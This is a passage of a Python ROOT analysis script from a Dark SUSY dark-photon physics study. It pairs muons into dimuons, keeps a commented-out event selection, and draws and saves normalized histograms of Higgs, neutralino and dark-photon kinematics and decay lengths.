Fakee1 = muons[FakeIndex1[0]][4] + muons[FakeIndex1[1]][4]
Fakepx2 = muons[FakeIndex2[0]][1] + muons[FakeIndex2[1]][1]
Fakepy2 = muons[FakeIndex2[0]][2] + muons[FakeIndex2[1]][2]
Fakepz2 = muons[FakeIndex2[0]][3] + muons[FakeIndex2[1]][3]
Fakee2 = muons[FakeIndex2[0]][4] + muons[FakeIndex2[1]][4]
fakeV4_1 = ROOT.TLorentzVector(Fakepx1, Fakepy1, Fakepz1, Fakee1)
fakeV4_2 = ROOT.TLorentzVector(Fakepx2, Fakepy2, Fakepz2, Fakee2)
FakeDimuons.append(( fakeV4_1.Px(), fakeV4_1.Py(), fakeV4_1.Pz(), fakeV4_1.E(), fakeV4_1.M(), fakeV4_1.Pt(), fakeV4_1.Eta(), fakeV4_1.Phi() ))
FakeDimuons.append(( fakeV4_2.Px(), fakeV4_2.Py(), fakeV4_2.Pz(), fakeV4_2.E(), fakeV4_2.M(), fakeV4_2.Pt(), fakeV4_2.Eta(), fakeV4_2.Phi() ))
# Both fake-pair masses go into the same histograms (linear and log-x).
h_dimuon_m_fake_log_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_log_0.Fill(FakeDimuons[1][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[0][4])
h_dimuon_m_fake_0.Fill(FakeDimuons[1][4])
# is1SelMu17 = False
# for i in range(0, len(muons) ):
# if muons[i][6] >= 17. and abs(muons[i][7]) <= 0.9: is1SelMu17 = True
#
# is4SelMu8 = False
# nSelMu8 = 0
# for i in range(0, len(muons) ):
# if muons[i][6] >= 8. and abs(muons[i][7]) <= 2.4: nSelMu8 = nSelMu8 + 1
# if nSelMu8 == 4: is4SelMu8 = True
#
# if is1SelMu17 and is4SelMu8:
# for i in range(0, len(muons) ):
# for j in range(i+1, len(muons) ):
# if muons[i][0] * muons[j][0] < 0:
# px = muons[i][1] + muons[j][1]
# py = muons[i][2] + muons[j][2]
# pz = muons[i][3] + muons[j][3]
# E = muons[i][4] + muons[j][4]
# v4 = ROOT.TLorentzVector(px, py, pz, E)
# dimuons.append(( i, j, v4.Px(), v4.Py(), v4.Pz(), v4.E(), v4.M(), v4.Pt(), v4.Eta(), v4.Phi() ))
# dimuons_sorted_M = sorted(dimuons, key=itemgetter(6), reverse=True)
# dimuons = dimuons_sorted_M
# # print "Dimuons:", dimuons
# h_dimuon_m_0.Fill( dimuons[0][6] )
# h_dimuon_m_1.Fill( dimuons[1][6] )
# h_dimuon_m_2.Fill( dimuons[2][6] )
# h_dimuon_m_3.Fill( dimuons[3][6] )
#
# h_dimuon_m_log_0.Fill( dimuons[0][6] )
# h_dimuon_m_log_1.Fill( dimuons[1][6] )
# h_dimuon_m_log_2.Fill( dimuons[2][6] )
# h_dimuon_m_log_3.Fill( dimuons[3][6] )
#
# #print dimuons[0][6]
# #print float(mass_GammaD_Legend)
# #if dimuons[0][6] > float(mass_GammaD_Legend): print "fake"
# #if dimuons[0][6] <= float(mass_GammaD_Legend): print "real"
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[1][6])
# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_0.Fill(dimuons[3][6])
#
# if dimuons[0][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[0][6])
# if dimuons[0][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[0][6])
# if dimuons[1][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[1][6])
# if dimuons[1][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[1][6])
# if dimuons[2][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[2][6])
# if dimuons[2][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[2][6])
# if dimuons[3][6] > float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_1.Fill(dimuons[3][6])
# if dimuons[3][6] <= float(mass_GammaD_Legend): h_dimuon_m_real_fake_log_0.Fill(dimuons[3][6])
# dimuons5GeV = []
# for i in range(0, len(dimuons)):
# # select only dimuons with invariant mass less than 5 GeV
# if dimuons[i][6] < 5.0: dimuons5GeV.append( dimuons[i] )
#
# nDimuons5GeV = len(dimuons5GeV)
#
# is2DiMuons = False
# nMuJetsContainMu17 = 0
# m_threshold_Mu17_pT = 17.0
# m_threshold_Mu17_eta = 0.9
# m_randomSeed = 1234
# if nDimuons5GeV == 2:
# # select only dimuons that do NOT share muons
# if dimuons5GeV[0][0] != dimuons5GeV[1][0] and dimuons5GeV[0][0] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][1] and dimuons5GeV[0][1] != dimuons5GeV[1][0]:
# isDimuon0ContainMu17 = False
# if ( muons[ dimuons5GeV[0][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[0][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[0][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon0ContainMu17 = True
# if ( muons[ dimuons5GeV[1][0] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][0] ][7] < m_threshold_Mu17_eta ) or ( muons[ dimuons5GeV[1][1] ][6] > m_threshold_Mu17_pT and muons[ dimuons5GeV[1][1] ][7] < m_threshold_Mu17_eta ):
# isDimuon1ContainMu17 = True
# if isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == False:
# is2DiMuons = True
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# elif isDimuon0ContainMu17 == False and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# elif isDimuon0ContainMu17 == True and isDimuon1ContainMu17 == True:
# is2DiMuons = True
# if(ROOT.TRandom3(m_randomSeed).Integer(2) == 0):
# muJetC = dimuons5GeV[0]
# muJetF = dimuons5GeV[1]
# else:
# muJetC = dimuons5GeV[1]
# muJetF = dimuons5GeV[0]
# else:
# is2DiMuons = False
#
# is2DiMuonsMassOK = False
# if is2DiMuons:
# massC = muJetC[6]
# massF = muJetF[6]
# h_m1_vs_m2.Fill(massC, massF)
# h_m1.Fill( massC )
# h_m2.Fill( massF )
# if abs(massC-massF) < (0.13 + 0.065*(massC+massF)/2.0):
# is2DiMuonsMassOK = True
#
# if is2DiMuonsMassOK == True:
# nEventsOK = nEventsOK + 1
# Event-loop summary. NOTE(review): within this section nEventsOK is only
# incremented inside the commented-out selection above, so it may still hold
# its initial value -- confirm.
print "nEvents = ", nEvents
print "nEventsOK = ", nEventsOK
################################################################################
# Draw histograms
################################################################################
# Each plot below follows the same recipe: draw the pre-styled "dummy" axis
# frame, overlay the (normalized) histogram, rescale the frame's y-axis to
# fit, add the info/header labels, and save the canvas as .pdf, .png and .C.
Etmiss_dummy.Draw()
Etmiss.DrawNormalized("same")
scaleAxisY(Etmiss,Etmiss_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_EtMiss.C")
# Higgs pT.
h_higgs_pT_dummy.Draw()
h_higgs_pT.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pT.C")
# Higgs |pZ| -- drawn via plotOverflow (helper defined elsewhere; presumably
# includes the overflow bin) instead of DrawNormalized.
h_higgs_pZ_dummy.Draw()
#h_higgs_pZ.DrawNormalized("same")
plotOverflow(h_higgs_pZ)
scaleAxisY(h_higgs_pZ,h_higgs_pZ_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_pZ.C")
#h_higgs_Eta_dummy.Draw()
#h_higgs_Eta.DrawNormalized("same")
#info.Draw()
#txtHeader.Draw()
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.pdf")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
#cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Eta.png")
# Higgs phi.
h_higgs_Phi_dummy.Draw()
h_higgs_Phi.DrawNormalized("same")
#scaleAxisY(h_higgs_Phi,h_higgs_Phi_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_Phi.C")
# Higgs mass, on a logarithmic x axis; the repeated Draw/SetMoreLogLabels
# calls re-apply the axis label settings after each overlay.
cnv.SetLogx()
h_higgs_M_dummy.Draw()
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_M_dummy.Draw("same")
h_higgs_M.DrawNormalized("same")
h_higgs_M.GetXaxis().SetMoreLogLabels()
h_higgs_M.DrawNormalized("same")
info.Draw()
txtHeader.Draw()
h_higgs_M_dummy.SetNdivisions(10)
h_higgs_M_dummy.GetXaxis().SetMoreLogLabels()
h_higgs_M_dummy.Draw("same")
h_higgs_M.DrawNormalized("same")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_m.C")
# Back to a linear x axis for the remaining plots.
cnv.SetLogx(0)
# Higgs |p|.
h_higgs_p_dummy.Draw()
#h_higgs_p.DrawNormalized("same")
plotOverflow(h_higgs_p)
scaleAxisY(h_higgs_p,h_higgs_p_dummy)
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_Higgs_p.C")
# Neutralino (n1) plots: leading and sub-leading histograms are overlaid on
# one frame with a two-entry legend, then saved in the three formats.
h_n1_1_pT_dummy.Draw()
h_n1_1_pT.DrawNormalized("same")
h_n1_2_pT.DrawNormalized("same")
scaleAxisY(h_n1_1_pT, h_n1_1_pT_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pT,"1st neutralino","L")
legend.AddEntry(h_n1_2_pT,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pT.C")
# n1 |pZ| (drawn through plotOverflow, helper defined elsewhere).
h_n1_1_pZ_dummy.Draw()
plotOverflow(h_n1_1_pZ)
plotOverflow(h_n1_2_pZ)
scaleAxisY(h_n1_1_pZ,h_n1_1_pZ_dummy)
#h_n1_1_pZ.DrawNormalized("same")
#h_n1_2_pZ.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_pZ,"1st neutralino","L")
legend.AddEntry(h_n1_2_pZ,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_pZ.C")
# n1 eta.
h_n1_1_Eta_dummy.Draw()
h_n1_1_Eta.DrawNormalized("same")
h_n1_2_Eta.DrawNormalized("same")
scaleAxisY(h_n1_1_Eta,h_n1_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Eta,"1st neutralino","L")
legend.AddEntry(h_n1_2_Eta,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Eta.C")
# n1 phi.
h_n1_1_Phi_dummy.Draw()
h_n1_1_Phi.DrawNormalized("same")
h_n1_2_Phi.DrawNormalized("same")
scaleAxisY(h_n1_1_Phi,h_n1_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_Phi,"1st neutralino","L")
legend.AddEntry(h_n1_2_Phi,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_Phi.C")
# n1 |p|.
h_n1_1_p_dummy.Draw()
plotOverflow(h_n1_1_p)
plotOverflow(h_n1_2_p)
scaleAxisY(h_n1_1_p,h_n1_1_p_dummy)
#h_n1_1_p.DrawNormalized("same")
#h_n1_2_p.DrawNormalized("same")
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_n1_1_p,"1st neutralino","L")
legend.AddEntry(h_n1_2_p,"2nd neutralino","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_p.C")
# n1 mass -- only h_n1_1_M is filled (both entries went into it upstream),
# so no legend is drawn.
h_n1_1_M_dummy.Draw()
h_n1_1_M.DrawNormalized("same")
#h_n1_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_n1_1_M,"1st neutralino (leading p_{T})","L")
#legend.AddEntry(h_n1_2_M,"2nd neutralino","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_n1_M.C")
# Dark neutralino (nD) plots: same overlay-plus-legend recipe as the n1
# section above.
h_nD_1_pT_dummy.Draw()
#h_nD_1_pT.DrawNormalized("same")
#h_nD_2_pT.DrawNormalized("same")
plotOverflow(h_nD_1_pT)
plotOverflow(h_nD_2_pT)
# NOTE(review): second argument here is the histogram h_nD_1_pT, not the
# dummy frame as in the other sections -- confirm intended.
scaleAxisY(h_nD_2_pT,h_nD_1_pT)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pT,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pT,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pT.C")
# nD |pZ|.
h_nD_1_pZ_dummy.Draw()
h_nD_1_pZ.DrawNormalized("same")
h_nD_2_pZ.DrawNormalized("same")
scaleAxisY(h_nD_2_pZ,h_nD_1_pZ_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_pZ,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_pZ,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_pZ.C")
# nD eta.
h_nD_1_Eta_dummy.Draw()
h_nD_1_Eta.DrawNormalized("same")
h_nD_2_Eta.DrawNormalized("same")
scaleAxisY(h_nD_1_Eta,h_nD_1_Eta_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Eta,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Eta,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Eta.C")
# nD phi.
h_nD_1_Phi_dummy.Draw()
h_nD_1_Phi.DrawNormalized("same")
h_nD_2_Phi.DrawNormalized("same")
scaleAxisY(h_nD_1_Phi,h_nD_1_Phi_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_Phi,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_Phi,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_Phi.C")
# nD |p|.
h_nD_1_p_dummy.Draw()
h_nD_1_p.DrawNormalized("same")
h_nD_2_p.DrawNormalized("same")
scaleAxisY(h_nD_2_p,h_nD_1_p_dummy)
legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
legend.SetFillColor(ROOT.kWhite)
legend.SetFillStyle(0)
legend.SetBorderSize(0)
legend.SetTextFont(42)
legend.SetTextSize(0.02777778)
legend.SetMargin(0.13)
legend.AddEntry(h_nD_1_p,"1st n_{D} (leading p_{T})","L")
legend.AddEntry(h_nD_2_p,"2nd n_{D}","L")
legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_p.C")
# nD mass -- only h_nD_1_M is filled upstream, so no legend.
h_nD_1_M_dummy.Draw()
h_nD_1_M.DrawNormalized("same")
#h_nD_2_M.DrawNormalized("same")
#legend = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
#legend.SetFillColor(ROOT.kWhite)
#legend.SetFillStyle(0)
#legend.SetBorderSize(0)
#legend.SetTextFont(42)
#legend.SetTextSize(0.02777778)
#legend.SetMargin(0.13)
#legend.AddEntry(h_nD_1_M,"1st n_{D} (leading p_{T})","L")
#legend.AddEntry(h_nD_2_M,"2nd n_{D}","L")
#legend.Draw()
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_nD_M.C")
# Dark photon lifetime plots. Histograms are normalized by hand
# (Scale(1/integral)) instead of DrawNormalized so the truncated-exponential
# reference curve can be overlaid on the same scale.
h_gammaD_cT_dummy.Draw()
normConstant = integral(h_gammaD_cT)
#print normConstant
h_gammaD_cT.Scale(1/normConstant)
h_gammaD_cT.Draw("same")
scaleAxisYcT(h_gammaD_cT,h_gammaD_cT_dummy)
# Expected ctau pdf: exp(-x/tau) / (tau * (1 - exp(-cTlim/tau))), i.e. an
# exponential with mean lifetime_GammaD_Legend truncated at cTlim.
funct = ROOT.TF1("funct","exp(-x/"+ lifetime_GammaD_Legend +")/("+ lifetime_GammaD_Legend + "*(1 - exp(-" + str(cTlim) + "/" + lifetime_GammaD_Legend + ")))",cTlow,cTlim)
funct.SetNpx(10000)
funct.Draw("same")
h_gammaD_cT.SetTitleOffset(1.5, "Y")
h_gammaD_cT.SetXTitle("c#tau of #gamma_{D} [mm]")
h_gammaD_cT.SetYTitle("Normalized Fraction of events")
h_gammaD_cT.SetTitleSize(0.05,"Y")
info.Draw()
txtHeader.Draw()
# Legend showing the analytic formula drawn above.
eqn = ROOT.TLegend(0.46,0.6744444,0.6955556,0.7644444)
eqn.SetFillColor(ROOT.kWhite)
eqn.SetFillStyle(0)
eqn.SetBorderSize(0)
eqn.SetTextFont(42)
eqn.SetTextSize(0.02777778)
eqn.SetMargin(0.13)
eqn.AddEntry(funct, "#frac{e^{-x/"+ lifetime_GammaD_Legend +"}}{"+ lifetime_GammaD_Legend + " (1 - e^{-" + str(cTlim) + "/" + lifetime_GammaD_Legend + "})}", "L")
eqn.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_cT.C")
# Lab-frame decay length L (boosted ctau, filled upstream).
h_gammaD_cT_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_lab)
h_gammaD_cT_lab.Scale(1/normConstant)
h_gammaD_cT_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_lab,h_gammaD_cT_lab_dummy)
#h_gammaD_cT_lab.DrawNormalized("same")
#myfit = ROOT.TF1("myfit", "[0]*exp(-x/[1])", 0, 10)
#myfit.SetParName(0,"C")
#myfit.SetParName(1,"L")
#myfit.SetParameter(0,1)
#myfit.SetParameter(1,1)
#h_gammaD_cT_lab.Fit("myfit").Draw("same")
h_gammaD_cT_lab.SetTitleOffset(1.5, "Y")
h_gammaD_cT_lab.SetXTitle("L of #gamma_{D} [mm]")
h_gammaD_cT_lab.SetYTitle("Events")
info.Draw()
txtHeader.Draw()
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.pdf")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.png")
cnv.SaveAs("DarkSusy_mH_125_mGammaD_" + mass_GammaD + "_cT_"+ lifetime_GammaD + "_LHE_gammaD_L.C")
# Transverse decay length L_xy.
h_gammaD_cT_XY_lab_dummy.Draw()
normConstant = integral(h_gammaD_cT_XY_lab)
h_gammaD_cT_XY_lab.Scale(1/normConstant)
h_gammaD_cT_XY_lab.Draw("same")
scaleAxisYcT(h_gammaD_cT_XY_lab,h_gammaD_cT_XY_lab_dummy)
